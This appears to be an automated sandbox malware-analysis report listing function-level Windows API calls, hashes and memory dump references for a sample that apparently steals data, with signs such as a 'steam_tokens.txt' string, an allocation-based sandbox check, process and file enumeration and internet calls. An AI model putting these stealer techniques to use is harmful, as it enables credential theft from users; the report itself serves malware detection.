                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C743095
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7435A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C7CF688,00001000), ref: 6C7435D5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7435A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7435E0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7435A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C7435FD
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7435A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C74363F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7435A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C74369F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7435A0: __aulldiv.LIBCMT ref: 6C7436E4
                                                                                                                                                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C74309F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C7656EE,?,00000001), ref: 6C765B85
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765B50: EnterCriticalSection.KERNEL32(6C7CF688,?,?,?,6C7656EE,?,00000001), ref: 6C765B90
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765B50: LeaveCriticalSection.KERNEL32(6C7CF688,?,?,?,6C7656EE,?,00000001), ref: 6C765BD8
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765B50: GetTickCount64.KERNEL32 ref: 6C765BE4
                                                                                                                                                                                                                                                                                        • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C7430BE
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7430F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C743127
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C7430F0: __aulldiv.LIBCMT ref: 6C743140
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77AB2A: __onexit.LIBCMT ref: 6C77AB30
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4291168024-0
                                                                                                                                                                                                                                                                                        • Opcode ID: fcd257f4c3a0a866e72d349b5dd88938ffaa15781323709a9a8798aa81b5fa9c
                                                                                                                                                                                                                                                                                        • Instruction ID: 44a6bb592861ee40db77d8e48527d363e971d6850d331fc9380bd4e176600469
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fcd257f4c3a0a866e72d349b5dd88938ffaa15781323709a9a8798aa81b5fa9c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84F02D12D207499BCB10EF7489851E6B770EF6B214F105339E88877661FB30A3D883D1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                                                                                                                                                        • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3183270410-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
                                                                                                                                                                                                                                                                                        • Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4203777966-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                                                                                        • Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                                                                                                                                                        • VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1103761159-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                                                                                        • Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 004119C8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
                                                                                                                                                                                                                                                                                          • Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 00411A4D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: strtok_s$FileFindFirstwsprintf
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3409980764-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04402B50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,044035B0), ref: 00404ED9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrlen$lstrcpy$InternetOpen
                                                                                                                                                                                                                                                                                        • String ID: steam_tokens.txt
                                                                                                                                                                                                                                                                                        • API String ID: 2934705399-401951677
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2452939696-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040B190
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040B1A4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,044035B0), ref: 00404ED9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 574041509-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040A95A
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040A96E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,044035B0), ref: 00404ED9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3635112192-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 7cd8234a4abdb81a99944f9f6d451a59de705a0f1975fd9f1c7cd260678ca252
                                                                                                                                                                                                                                                                                        • Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7cd8234a4abdb81a99944f9f6d451a59de705a0f1975fd9f1c7cd260678ca252
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040AC1E
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040AC32
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,044035B0), ref: 00404ED9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3635112192-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5dd6e1886fe9a9aadc567094d83ba0008eab3b8b6066a721d99fb8c77c53bff9
                                                                                                                                                                                                                                                                                        • Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5dd6e1886fe9a9aadc567094d83ba0008eab3b8b6066a721d99fb8c77c53bff9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 626452242-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                                                                                                                                                        • Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
